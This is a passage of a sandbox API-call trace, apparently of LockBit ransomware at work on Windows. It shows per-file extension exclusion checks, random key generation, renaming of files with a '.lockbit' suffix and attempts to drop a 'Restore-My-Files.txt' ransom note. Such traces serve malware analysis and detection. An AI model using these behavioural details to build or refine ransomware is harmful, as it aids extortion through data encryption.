NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.555] malloc (_Size=0xa6) returned 0x77d7a8 [0138.555] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.556] free (_Block=0x77d7a8) [0138.556] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.556] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.556] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.556] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e42c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4540, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105272.WMF", cAlternateFileName="")) returned 1 [0138.556] lstrcmpiW (lpString1=".", lpString2="J0105272.WMF") returned -1 [0138.556] lstrcmpiW (lpString1="..", lpString2="J0105272.WMF") returned -1 [0138.556] PathFindExtensionW (pszPath="J0105272.WMF") returned=".WMF" [0138.556] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.556] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.557] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.558] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.558] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.559] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.559] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.559] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.559] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.559] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.559] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.559] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105272.WMF") returned 1 [0138.559] lstrcmpiW (lpString1="ntldr", lpString2="J0105272.WMF") returned 1 [0138.559] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105272.WMF") returned 1 [0138.559] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105272.WMF") returned -1 [0138.559] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105272.WMF") returned -1 [0138.559] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105272.WMF") returned 1 [0138.559] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105272.WMF") returned -1 [0138.559] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.559] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned=".WMF" [0138.559] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.559] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.559] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.559] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.560] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.561] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.561] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.561] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.561] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.561] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF.lockbit") returned 72 [0138.561] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105272.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.562] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.562] malloc (_Size=0x40068) returned 0x3ef0008 [0138.562] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=17728) returned 1 [0138.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.562] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0138.562] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.563] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0138.563] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0138.568] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.568] malloc (_Size=0xa6) returned 0x77d7a8 [0138.569] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.569] free (_Block=0x77d7a8) [0138.570] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.570] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.570] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.570] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e42c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4b28, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105276.WMF", cAlternateFileName="")) returned 1 [0138.570] lstrcmpiW (lpString1=".", lpString2="J0105276.WMF") returned -1 [0138.570] lstrcmpiW (lpString1="..", lpString2="J0105276.WMF") returned -1 [0138.570] PathFindExtensionW (pszPath="J0105276.WMF") returned=".WMF" [0138.570] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.570] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.570] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.570] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.570] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.570] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.570] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.570] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.570] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.570] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.570] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.571] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.571] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.572] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105276.WMF") returned 1 [0138.572] lstrcmpiW (lpString1="ntldr", lpString2="J0105276.WMF") returned 1 [0138.572] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105276.WMF") returned 1 [0138.572] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105276.WMF") returned -1 [0138.572] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105276.WMF") returned -1 [0138.572] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105276.WMF") returned 1 [0138.572] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105276.WMF") returned -1 [0138.573] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.573] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned=".WMF" [0138.573] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.573] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.573] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.574] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.574] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.574] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.574] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.574] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.574] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.574] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.574] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.574] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF.lockbit") returned 72 [0138.574] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105276.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0138.575] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.575] malloc (_Size=0x40068) returned 0x1ff1e60 [0138.575] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=19240) returned 1 [0138.575] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.576] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0138.576] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.576] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.576] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0138.576] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0138.581] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.581] malloc (_Size=0xa6) returned 0x77d7a8 [0138.581] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.582] free (_Block=0x77d7a8) [0138.582] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.582] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.583] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.583] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e42c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2d14, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105280.WMF", cAlternateFileName="")) returned 1 [0138.583] lstrcmpiW (lpString1=".", lpString2="J0105280.WMF") returned -1 [0138.583] lstrcmpiW (lpString1="..", lpString2="J0105280.WMF") returned -1 [0138.583] PathFindExtensionW (pszPath="J0105280.WMF") returned=".WMF" [0138.583] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.583] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.584] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.584] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.585] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105280.WMF") returned 1 [0138.585] lstrcmpiW (lpString1="ntldr", lpString2="J0105280.WMF") returned 1 [0138.585] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105280.WMF") returned 1 [0138.585] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105280.WMF") returned -1 [0138.585] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105280.WMF") returned -1 [0138.585] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105280.WMF") returned 1 [0138.585] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105280.WMF") returned -1 [0138.585] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.585] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF") returned=".WMF" [0138.585] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.586] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.586] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 